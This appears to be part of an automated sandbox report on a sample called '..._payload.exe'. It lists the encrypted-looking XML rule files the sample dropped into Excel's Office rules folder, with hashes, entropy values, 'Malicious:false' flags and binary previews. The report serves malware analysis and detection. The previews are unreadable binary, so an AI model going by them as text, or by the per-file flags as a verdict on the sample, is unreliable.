                                                                                                      Preview:<?xml...N.bZ.o?.>1..k@..r.2kFk.=.V...Do}s.u,.HF..F..99H(..m..+.u.e.p.].v*Z%....a=..kD...a6..v...'GI).I.Z..>.5.\.9!..tgD.I...Y....Y.:_.8.H..,....=...c.E..Jb......s......Z(....,..S$.9K...I........P.~..U.b..o#.2g....0'<.....ZP.]....%..,.R../.I.)..H...4...}..... F4Dr.(..2...T..c...lN8S.... qF...iK..U.6....?.......[....... .Ud..P........@Z.R...gz...n-r.U.\?\......F.lm.a.R.d.yaVl.3.*:....K..m.B~.i.0....b..P....68..CY.....B........ xj8a..(/W....2...........].!...?.;1.].z.l..hH.?FiW.V....L....&.pQ.\.O...O[Z]l....07.1....X..'}..H..;(.kp3.H`...uSt......dz.4.!.....TZ.<..<sV..N.....#..18..y.q..]....-.v.E.4...@..;e/YBr..O......#.7|...i.. :R{...(...H..X.d...R.D.LSB)..#\?........".).1......xNM..j..L^...UU6.......>+mc.NB3l...9........ng..*.N..N.....{e.Q...".....2.n6.^r...i..:...Dw/0..../.t...(.s......4#?.W[..g....'@.....o......|ou..RS..Xl.....D..h..2V.w....+%.R..k......a-.[.._..H.....1..&.KE5My....;&...z...<......J..-s.z3@#M(.op.=.+&DX...%s..C..+^

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325001v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2318
                                                                                                      Entropy (8bit):7.9176600537549575
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:5X5FuObBBoWw9kF7eXHVLUlWrXEcesBZKPk+ShvDLSqwD:5pFuGB8CG1lj8YhKf
                                                                                                      MD5:3DD3099491614600EAD53453F44A9265
                                                                                                      SHA1:E669E4EEE53EFB69DD21B75212FDABD4B4FCA570
                                                                                                      SHA-256:FA6495F05C9ED6E866C9DA15A7DEF64E1761ABCF73C962CE43568EEEE524F9E8
                                                                                                      SHA-512:C7DF9001D28ED56FF0C4E412B0A995461FA627D8EEAA679B2D8B383D2292C6A687A6AC6AA41EC50DE0FC4FC515C0FF4B290C6376600AAA001AB06E3F354E246A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml~.l.D..l....W;P.1...on....x~...F...I.i...N.......^]..{.".O!...>..ft'1r.z.{9..:.B......1F.7[q.....+..R[...f/...]..^.6.......%...[..[.......]...*.".e..Q.&@....#.x.1)....].....],.ua..L..P}__".1M....8..AcQ.".....E.l.,......k..<..r........8...'...S.f._.........%.@.q..9..r..w@....#.....v.../........h.~..!..v.w.);..SFf7..}..........,.Z.)..A.^P{tz...E*e`1.........f[..1.[_..h.....l.....\oE..G.|.qsVN.w5l....Mw..W.q....../e...k}..U-.[...[7^..1e...b%.....$.n.r..)_.....4k<..EbZ.......^..P8....nM....X.g.....E.=....&.|A...T.Q.......8.0`.l....v......,.l}[....<...Tv..B..K0.`..EJg=.(.-I.Fc......m.u..d)..b2A.7n..s..:..z...d....k}i.7..+.2..90........<f..#~...f.v..6./(Zb.^ ..W.s}..C.u4...I..A..J...Q.k:w@.d.1..;.c.M..:.6M...cGzZ..H.>t..........c..H..r"?V.L...}.S...S:.......=.lt...@c...|.(....N...9&..W....+s...o...".B...kE...WR..1.*9....+88.>\.3....YUl*....0Y9......R......\..9o..7..i.._..vL.6"-W4..,..9.......F...F..~....+....l...9.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325002v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2388
                                                                                                      Entropy (8bit):7.912129728447306
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:URxXF618WhhtYivcFIivaJaV45xN1LRs4VbApSBBrQVrdjf/ZHQhwD:Cxa8WXtY+cSmuo45xds4VMsKrdFR
                                                                                                      MD5:FDDEAB61EAAE0924BAC3C1A146405571
                                                                                                      SHA1:2C261567728A4FEEA2642F1398B0D42511A044A5
                                                                                                      SHA-256:E1B6D5413560CF1AC98A6C57F4037C97A43E1651191FBBF8E704A40D34D6330F
                                                                                                      SHA-512:5D2C09645387EAE58ADB0EE3E1969B2E1F6D40B2BFE2E2AF5AC10097ABCDAF13B6C0B30A7467D51B2333BC9A7A94C70D1CC4B271622E6BD1761D7B24F40A8961
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml7Ed..:x....._..S.oG>*.+.<XU.z..~....9S......2$X*.7.`L\...+a`.....L4........`.?.]}...N:./G..}.]W:...1..<..9.g&A.EUq.+.@...f#.4|.i.S..x.6..{s.io..o=. ~..Q..v&^.Fr.`....'i...{..]~.<...0..\<.N.ng.... &#...Y...*;.r&@..|..]...g.'i..1I|.)`.B$.....y,YO#.J....W.n........._d.Zes...C.....i~....|..J..`.\8A..3.N....@...B$..#c..x9.p`.L..m.,....2...6...,...n.l.:..-.h.y.....dKt.uw...".<{k...................G..?...}&...)..C{...,.1.L*./.V-L.hWAw(2...e..Y|...'....Ss.>b.Q}.6.EvI....a..#.$!.ycC(.W.......Q..^.}.w9.*T.Bq...C.......;.r..:V.....^I1Yx.w5'.f..G.....~.S...f.~..$&l.W....2.....:#....X.;.h...M.h...TnZ....ia.7Mz.U..J.s~...0c.(..Ob..:O#q.....Hl.v@e.S...JS..>.V{.{G.1$i5.=.g9..y.p.}.......8d..*...&s/..@...K.._..B}ew....&...:.:z...e5qb....C1......W..|..*v.*.Q.A..F....d.G.V.vI...v91|0wXL|?...}.<.U.nj..$..l(s.4......E#.s.V1.....%....aL..2..L.z.J.].. .*....t.#..H7.....\.P.%SB.....?..e.....1...mz...vy....U.....i./HU2.....+.<)gs.y..9m]8..........N...MU.|....;

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360000v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1197
                                                                                                      Entropy (8bit):7.810562092672058
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2q/GNZtGtAe5TI2AJ6/JQH+XshuZ5EDHQ8jX92KJLSDniicYiUTGUABv6bD:2qkZUt/T//2H+3EDw8ZPSDiIlABwD
                                                                                                      MD5:D1EC5DD499E4E95BA52BD8FDCEB4C96B
                                                                                                      SHA1:E3C634CD3CB5F2F2879BDD5CB04141A26F9E12C0
                                                                                                      SHA-256:3C24B1F9B74D4508CCD835DB2891F4249D20FBE5FCE7C70A2332E50B091C25ED
                                                                                                      SHA-512:EF8AE88B68F88D5C49B5BB76E6565D0A790E2FBD0DBAC441113A87A30EC6C0EA8832833BC40D153AF7E6D966839A92526AC343AE004B2D2B46F007D54AD6416F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.$..O...3....c..*K..d..=bWI.._SR...`B..3[h.0...r.+1n...T...C..T....%n1....,I..](.../.../..e.nYk.......~ZPQ....E.IC..^..d..P.6.s....k.<...V.\...8.B...$N.3.2.r....O..s.......N2..E.....93_E..k......|+.%E{..1X]1.%......u.n.gHm.m.7Y..y88..E..Oa}....Bh..M.Lw..P....^J...../._-.!..3{$.Q....MH..^A..A.)...o,...>..pJ..,.(9.7o..L..\C......>.=...Y<9mn.c....%...-.2.u..Kj.w...B.v...],.B.B..rO.I2m.....^"^0S..H6;..y....4....IQ.(..6.4ni../.H|.S.y...k.@L....J..7_..>......&Nf."f/.^,.?.&2^....@D.}.'.3 .*-.`..y...[>\.I....W.;%gE.. DEy....W.TX!."-Su.3U.@.dlm............2..}S5.l?..M.W.I.-\..s.]x,8...s.i.g...N.....y.s.?G.h.....7.g.F\....JUn..../.{.D)R1*G...=f..=.h>.C.T7`i..j.-.t........ox.......w.....[.j..Y..MCL^....(.......T..n7UiPv.4...-..a.M....r...5.w..8w....x.uZz....%.r.92.7..e......8.......m....M.....-... .&4F..yC...It.T......f.m%[4...+M3...;...l/.1!.v......1.R.8.$..._.X..*%.....+.Xg...pNx...'.._8T..|....).R...M..V@.....5..f....\..|.n..}.....G1[E8.r7..E~Y

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360001v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):771
                                                                                                      Entropy (8bit):7.720482969420305
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:i4swNA4TkJIjg6M+2pMlVNOzhLtMhsVlW/yLGSHf2eXKeftEwA2Wzv6cii9a:i4D/kOjgb+MMlfezW6LfxtJWzv6bD
                                                                                                      MD5:F11693D544B999B1EFEF49A625483876
                                                                                                      SHA1:709398A02BEA379001138B1B0E12461329C05B2E
                                                                                                      SHA-256:8F88710E1BB08054B5DFFB6AEA2E368BED6F4CD2EC1298736B0B622A61C9A207
                                                                                                      SHA-512:C44A59EDD3C12DD3BD4D32DE1CD772FD79148D9004952996E52AA93ABC270351B868FE67F2D28D06440CA57F6347DC4DF8709903B222C2C49D4753987CCE90D4
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.......[..\Z.\..8.....Y..J.I...;..*O.~i.b62..d.&....C...D....r... ..>v.@.....p....Rf./K.4E!.n{$-r.^l.m...W.i.o...f...&k....6..R.....K3...,.|?.n.@e.j......H...b.$.....F..2..<L..*ni...g._b..EXb"..;...=.l.J.I........8@...k:R.='.h..C3.'..x.=.h+..~....*.P%t..0.....KW.....a..(...;..?.=q.(v#od.m`e.`*<9.........,..a.7....|.+.....sa.o......F..-.wU.EO...-Y.ku.jG..\..[W..E.....&...db...}.>|.O..,.Z=..q.{,.[...3..H..`^.r?...<.....{...8..8...,Z.x.......'.>..U!."m8/u.P...K......qc....1....Y.(_..8,..%RS........G.<A.)..!0.Q.lu.S.+....wo.....7x.."...,.T...I".:..?,9.8..B.....yI...v.B"...."....L........w.iW.2.G...<D.F.f.Ww.*n...F...UQ0..........u.v.R..5..A.."E.N&VhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370000v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):863
                                                                                                      Entropy (8bit):7.746315080852844
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Kau/HlpOjB3wV+sMCFD650n95/drY9TB83btRO3jsgv6bD:KaGHlpy3wFbFrnb/dc9TOjujsgwD
                                                                                                      MD5:8F2619A4A1ACE00A12098F5908BA9C37
                                                                                                      SHA1:10C0554343D33645B2C92C6208C5810C40F17E07
                                                                                                      SHA-256:5AA350F37AD4872D1DC744303CF80DC576D13A59F39DB8693AB8689E8B1F9E2E
                                                                                                      SHA-512:BA6BCB9ECEB7B5E4AC938E6FE2D5FB05FDEB4922074BBBF002EB01BE9053A449E24A92692699D6BB5415BE01FE6CD21058434B7F84A116637D80CA69B366E478
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlo........~.oW..u.....[Z.C.`..0......W...E..}kI.g>.X..~....,.....>..]./...m.uQ....._.r?>|......a.>.-....arJ^.n...}63.@......,..|UB.L\...#.Ku..j..w.1.~..<.>.....}.G.^..dr..gt>R....g....k}y...9.v7...a.w.....z...)sf.63.$.6*X.>.C.Z/{Z..ji.PS.VaY6.?.@A.F..U..2^Pg.pvvm......8l......C.?tm.x...al.q6.9K5.h.Q...8....T.B.........[I.......6.......8..:..{>aW}.oK4G..b......j..'"#I...4.g..ykh..fI].x.}..j...O.[......=o.`.w.;J..oU.>......T.\....`\......&..C0.V.E...T.iPqa...J......a........j.VLM...K..l@..B.....Q.k?....~S....5..YbYj..Oh..3^I.?>K...%.jS._......{L....TuDZ.p..*......Y....../....0@.o.....Z)F.3..;..[..&.[......I.....!K0.wm.(......2......Wa.*Nu..Jd8......n.n.9%Gb.%(...v......7..-K.C..t.;u...=...r..t... .9..9@C...|.K../..D....g.'.K@..Zr.N.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370001v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2604
                                                                                                      Entropy (8bit):7.926037895827441
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:By7Z/aKrvEdV3F/Z1BQCi+mTiHjhV10QGBvVDVNvonW9xpDoYOZOosn0NcwD:gQKrvEdVn1BO+mTiNVnGBNDXonW9XoYy
                                                                                                      MD5:65B0562BDA762750EAF357B965346935
                                                                                                      SHA1:F52179232FCEE4C882290CAE5CFF06CD7E145754
                                                                                                      SHA-256:82A746D87557B0C0810755461F5775919A151FB9583DF7DD6A35DAA63FD9072F
                                                                                                      SHA-512:8958A1594EF36DF941FCFE4417646FEA7560E9410FD721DE599F76BBD235442CD139F356BFE93B8CD8714FD37D84B585D110D7789FC09FE976DBD94A4716E5EB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.......5>%&.W..<..{m....$...L5...?.A.!B..A..{.c....~G...It...O..../..z.*..>A..$..D}A....q...{.w'>...{.(.u.[".W..u.K......%=..{<Z..BNF...v]..v+..MD...B....u.@...l./..W3S.......{....".Z.*C4.U..nUjM8U..1.4..1"+.q.'4F...^..t....y.E0&Qp.Dz.....l..t.+.-..@...8..~_.W..JJ$0...=..E.....J.Q-...d.8.x..p..?... ....s}.Bg...^.....^.N?h+..'.u...qYDt...x..pr...plt.......^L'A$...N..M.5....(&..............0....f`...A&...#.%{."..H....8S.....#+.y:8V.!>4.&......>lL..Od..hzL..K.2..!.P.%..~.$.V#....H..rD..d...x...c..>..\1....!}.E.D.<.3...'...p[X./b.7...5..f...;u5.0.vG...x.K^.1..(....-.N.D..w...y........|w...F.>.p.?f;.=..G.U&..vX.0M.........Y....3V.@g..N..D.o*}~....C..q....S.U.4k+..2s0.....8R.z.Q.q}>dq..%....u.9.b.,.d..4X.pf].......$...S..Jr...h.]f{..<....b%...(...;..Z..9..4^.. .N&.%.V.....!.h..P.3O.8b3.U..-C.y.]z.w..2..j...0^./...i_.j.1..X..^..UP..)b.Bp..[....R.wP.8uk.H.m1>.>B.#w..1U@Ze:.~..z.={. ..Qm.....$..G.e.../.D..Y....~SF...:.|..>..i.....R.+..F.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370002v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6109
                                                                                                      Entropy (8bit):7.971168534103209
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:lr7kvGSjt9qAholiXRl1IF4HBksprQAX3INkaLpTqXcdReKp0TjU5/eMbH3SO:lroGSx9lTXKcasE6YFpTS1t3S/eun
                                                                                                      MD5:A7E7B2AB7ECF288A0C3B9578CA81E419
                                                                                                      SHA1:6AD75DFF5627B23E6C9B4741A2A48BBC410B8344
                                                                                                      SHA-256:0A5EB0C142C951D33C52675FE66A8682D728EB2E404B6194710A4CDEBA146D08
                                                                                                      SHA-512:1D4B121B5214EB075052FBB2548588BBE4CE99EDBA3EF2F7297F5FE42AE9512C96A356EFA161750F19CDF760CF36B0C70E5DD5FADD554F4BCDB9A1A11DF10243
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..g.F..qbG...K....R).,....G.]m.0.>.bA..(..y?0X...;.L.aHj.aw]..~.F..eE...&.Kc.-...g.~Hf|.t...-.fI..E'"..h...@...u.@...F..d..B....T ...D.m...{v.)2.....F...y.c.o.!...Uq..R.(....8.......l..`....*.i8.{.>.['.U..........,x.}......z....x<.|bv2.....b3)...&@..3A*........u.V}.3...}..C......R.[.....&[...B..Y.&....c....0\..?d3#..I....8....%....1.".6.*.1...'.B..M.$.).>..G[..[.=..`....._..LJx~8.....q......{.KiN..oI.^K..p{.(.@-.Po....c..S......W."..........>.m.Z..4..k.zi./.Rv|..X0D."R..=..M@m....b"A.Q.h0.,...\..Re.....T ....<p.9...t.;.v....gr/..o...D4M%...W..`.*..RI...Q.h^R._G.`X_..oo..ayp.....w~..=6M?$.2T>.|T..~l..,I.`"..-..8zi.j.)OK4.Wv..4.l..wM.n..D#.np.H.Q..%...3...K...$I....du.C..[..=...B.RN0...9.X.._..Z.pv.....;.%g..]#.c..".r..8....{.>SM.N9.fBMw|`.gpi..>.g.....R.......:.;S....V.WtS.~.T,.....\....>.S....V.d.61.A....A....e..}..a.,r.'%^..h.R..........`...L@..;.c_&....T.x....~Pt..}.s.Y:....2.....q..=...6.R...l^>p.H...!.....F...={b$?..$.Nu.l......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370005v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1454
                                                                                                      Entropy (8bit):7.855617135021377
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:j9+GPtJz/FbeGtVD/cXQ/jEJ9iemrVW6koVi/WyY+3sEdbjEezHlUxdyc/MrTv6X:x+4/FbFTQb6VW6tAB3seQeDlEkc/M/wD
                                                                                                      MD5:1ADF687B355C12A4AB056263B54FA76B
                                                                                                      SHA1:F9A6FC8CEAA661CD71B0619904D3A849BEEA65FA
                                                                                                      SHA-256:FC4D32BFE775A6F62236E9B2C22B95F9055F8AFCFD7FD9C682892139FDD35E6D
                                                                                                      SHA-512:C610187BB979E85C0CBE57DCB5D6C8A6A67322315EBC5AFE8AE74E8FE0459243FCB45B9F1CFC5C67EB1CB2484DEF7C5D14A8CD8705879DE0D79F9CC9A82B35BF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlq.xsodg.s{...WD.....OnU"....M.Lv..#...4m0'a.$ZR...y.....`..2U.d"(H.......^..K....q6mw...,*x~.{.........+.!W...s:.N...opBJ.......t.%..X./.x].oq..M.@.eC=.B...z..B........Wv..U....@y......A......0...-....r.7....N.......Z.G.?.l..fQ4nW ..at..=Z..jzm.7.)A.$.]&.....,(.....0..4..VG...zF.....T.!..q....[.7.|..R..G.B.i..Q..:.Wt4.]/.P.Mq.F.4g..R......@W..q..k7...h1.t.xW...4...0...-...........b......V.P...k.._.G....CdvR..R.!..\>.z8...._.[....A..p...i.,2..p.8..d..........[aZ.HMq.c.w...{}2DLY..*.!.(.f.M.'...._..bg..}......{.....~%..f.u.N.EI`.]....F.L.^.*..d..<t......ix.'@...Q......<k.P'..A..k...TJ.._!"...He2.S.L._...UM.._)...%.i!.z....y6....r.W..T...Vm...[....e>h...h...c.8.......m...R.T..L<?..?jp./...(.*..Kn.L.H6..(s..>..zh.Bh|y.@.....C..*l.+.+...8{.k.....a0...1.1.T.C6.Ey...:i.M2F..Z..y.....ec,.........Cuu....j....u..o...,..@.n#*...SN.+W.R<.9Y..z...j.....;.P\B...h.v.Ku..w.7 ....$B.~.zQ.B.8....oh..2..&]Wv.!.eV...()5..U.;....u.....a....V.,...nS/

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370006v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1120
                                                                                                      Entropy (8bit):7.828248967977821
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:I60V2wUmbkm4psX4fifRe/12hFU8lgP5dEnT77UBv6bD:x0V22km8F1EU8GP+7uwD
                                                                                                      MD5:19AF673BCCB6C91CB0BDAA4CB8A04C39
                                                                                                      SHA1:273E857570731373F1EA647AD9D3A77E949BA1D1
                                                                                                      SHA-256:A2249BF4DAB209002F692D3268F6F54E47D75C2954B4756075A212DC87B52B8A
                                                                                                      SHA-512:AF1A1891D32EE477CDCC8971BD975B06AD53D787050CC91C73A9C89997538F6C1E40AC6F463D0862EABA79CF2FF9FB4849B275C1BA3FEC07C5416BC107FECBF0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlu.Y.f..fH.7^.2.<_..7.7.:...2 @<...Ki.."?....\'.@y,......l^.i.].'..a.$.lY.(..<...9J....H...<.Y...!...u.h.F.FN.f.?.W..Z../.`.....,,.i.....A..N.*0T...'.....m+JO_J....9...xK..mp../~s:.L.B..Cf.WO/..^$..t..OQ.S..{.........W.qL{..}Bo.&..,ux..;Z...vin[....D.{..P}..f..-P....K....!)..>x%...o..%}\...<..`$.!.h.4({....0...a$4y;A..........jrMm.....k8.w.T..5...p..:...?.......s.0R.LB..U.t..7;....g....f.;c*.d...;..0..>X..Cc.....x.D..W."...b.@.K..`...i...t..!~..9O..2.Ae..A.:.4*.c...r.]h..Dj..!.s.j...'").R....."..1....).Jzn...).B.q......%>Hi.b....8.h#.J.........l.0HmO..c...@4w..;.!.{...9$xk..Y.2...1...C..j&....q.Ef...."g(........]l....,~.r~1...k..p.L...TW.t......f...*<.. ....(f.|RZ...86.j..S.........&T.P.S]I.VX.c.I..K..[nX...y....:..;.......}Lp.h.n#.:.9.aV..)...$.......`4q....#.....7.....Z..[......)c.f..G..U.....Z.o....hb[...t.....K...;..}.>...3.B.l#.7..,.HR.^Ay.....L..e.!L..)~...J.-~]+t.F...+c*.,S......2DB!....o...c...(x.*.Z.1.Z .8......{S.3q..C...uH.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370007v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3678
                                                                                                      Entropy (8bit):7.9500648901903626
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:1Z3YTXQrjBGUnCV2YAIvh6tb1M+FKSSINWW/P/R:1lWXQvsUs2YAIvMtb5SIzn5
                                                                                                      MD5:645BCB6BE1C64D7AC7AB2147AF89EC1E
                                                                                                      SHA1:FE627190D2424B685F4D14384C3359E376B89322
                                                                                                      SHA-256:E45C99B147B153A6088A3916C81B82929E3265C682D7CC31E9FD5359E240D5DB
                                                                                                      SHA-512:8AD0CF04FBEB5E3ADA3B8DF2236AD3AB8CE5A308F426DE12AEE69A7D7CF508F778B13F92CF6B78DE2AE91ADF3DBA1471FDA2ACBC5D30DD3CAEE4626467475F8C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.6..*.JO{PrH.pJ...x.K..n...s??.......b..s.l.cX./7...u..X..v...v..J.K....8..+...xw....\[z...f.M=[.)LF...NP.l.=..<.a.Tr7-}.$[.s!.^...NOX.M..$...1..Z..!.#..WMu(?4w....b.aa.#.ze.V.......w..r....g.}?!...V.....vi.....a..Ir,.....]x....|....."...s...z..%.[.^.V.e....q.....R.............Sj...,..z;..,$X...(...f~....3.e...(.%.0@..&!dVz.8v...M..8.2.......8..`.d..>I...yT.......8..ava..u.+...;.C......@..C...(..J\.....nP.SV...d.%.k7.H.i#.@.$......'.E.....!.....b...+Am...b%..d,...s.e4|S.UI~.....'.3"e... .........o..#W...........m68.....o......0.W..g..BH.L..:7...QF1..T.RT.9...DR#......e.].D.ydl.I^..).J..S.h....IX..!...Z.}!i..Pq1.c.I......X:.J.k>...52.m......{......U....Yp.......p...bp...t7|O%Prs+hC.U..\....J.W6eH.I..YBL|J .2Q....J+.J.*_..|....M..w.D,....hi..~..[..)X!...A.....6].qO.]....:+.^*4...C.1s....Yn+n.,........k./..E[.N6kj.o.?.-.|+/.Y..p.[..../..E.+9v....=_..a.C+Oh6Ts#.........l+.{;[.\.vJ.).GZo.W..TQ0Px....=t^.4.VL..%...cU..Y.~wiQ|..../.).s.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370009v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):961
                                                                                                      Entropy (8bit):7.756324856200042
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Iqd5/htysg2UmWNufV1Lm5Zno3BBFC64J11rMxv6bD:XHyNmWcfV1K5xo9/aexwD
                                                                                                      MD5:46C62410B8E0B0530809A1D9399E96AD
                                                                                                      SHA1:77B3D4A5AE9C21D016F8174ED636ADCD40A1A182
                                                                                                      SHA-256:581F65C35C5861AF1F8DB590CF76F857DC02BC771ACF344B5C00BE0FA1088A89
                                                                                                      SHA-512:1F693164C44E41AC63CDC6AC6B5735FD47022D0C4089F0FAAD2F9D076B836ECBAD04268A69A8CBBA6BB6DE884A0570B522F6E34263B5EBE5E94A04BEB9EB74C9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...6.....v....mn...@.U.....$.!=2A.r......Z...a..|.l..t....x........1{.j:..."A.E*..=-..L.#..h.m% ......&......q....I.....C.>.....3..O.-.K'... B3-....U..w].:.F.....K....V.....F.r.~...od}.....$.h.N.h.....h.S..M@.....d|.>gB.u2..Wp.S..RKd....i.............?._.W..}.Sb...d...J..2......!"...F._....8dS$..U~...%Gg..8..4.}..x^.Z.........B.hD;U...&Y.X..hU.,.....@6tyE..]..Kp!.=......).Z.2..d.v\.\.....{?..B......#:..9*....\..h.^R'.W.M.f..M^.....'.9V~}.w.._..NQU....B..Q.#]_.*... ;}."....p.B.O..|.......sF..9>..%...(.6.I....)..S...uJ.....!..p.u...rh..i.r...y_.W.....1f.XY..}i.E0.P..J.....6D.b....y.7....}.j...3.Qq"^.......1.<.xK.U}f.,.h?...8....._~.'.P8...M.w.....K.U.2X)1$...8...s...3(............Vm{.h..:m'.5.N....2.p6V...E*.'.l...3.~-.j........Y .....M...$.+...{...~m...b%v....F..;.......)4...AV...f......T@.$......`...b<..$...&....=......hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370011v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1191
                                                                                                      Entropy (8bit):7.838559352542161
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:CPkwgQ61Qb3H83IbVTuv1ShP2ePMsoiw5Dgpv6bD:CP7v3/0v1ShPAs/ICwD
                                                                                                      MD5:1AA6EF060992029CC3A43636C262135F
                                                                                                      SHA1:0B85DACFABF33149FC4D49722A3986FEE9FFC8B6
                                                                                                      SHA-256:0F17390CF4ABAB41E4202B939744899B20D17A646A878E257A19928F27245711
                                                                                                      SHA-512:2B0B3AE50060D8BE42FA501C58F5392A5DF543BE0466C290C59FBDB22327D9A5D14B130C0234661AEE4FAD445F35189B568C69A64DCA251E8AC104904C9F918B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..f1..-.4W.b...w'...Q.c...b.#..y....V-...JN'.t.W...9......u..p...(...O.k).L.i.........@U..F.....7B.$.Qi....&..Z..h......z...=..@:.....y_3....p{_..m.L....7..r.6.....m....-n/...5.|..}.dx.>...MN(Vb~q...+...oH..........$.a....b._....a.?7.DA..Lb.t.5.A.c...P.....F..a'....h:5.G.CA.*.....L.q....I......X.N..B.V..j...`.!o..k....0..{+..A.+:.z.Ur~*.,..9.O...*.(....>T.2".z..|.H*.....$.{.w.5 .....V.s..U'.&..*&.......jg...'w.]..Q.X.Kg..IE.X......).....<U3...|.&..L.D.D......s\.-.F.<Aq..dy....BwS...<.Jy."T...K....CC....$.\u.@..lD.JJ.p...n4|.........i..h.G.K.... .A.5.Z.Z..$.^.1. .f.....$...g...H.D.w.Q.....!.).X........2;.........`.J..A\HS_j..3.....(......Z.....j..b.M.'..a.tF.^.J<...^...x...j.\..;.%.$62.?..g...O5..o..&uEU.f .n.......%0E...[B......#.X_c...N.>.......)..g.uHb..6@IG..RZ.p..Z..&.&.%......+E..EI.&....ig......#-1.......F.,.x.O..3(.b..nu...Q.w.......j....t...j..).jo....i..%.....X....B.i\..[..c..a.u...`....f.M.p...b.L.D.K.....WP..>W..^...(..

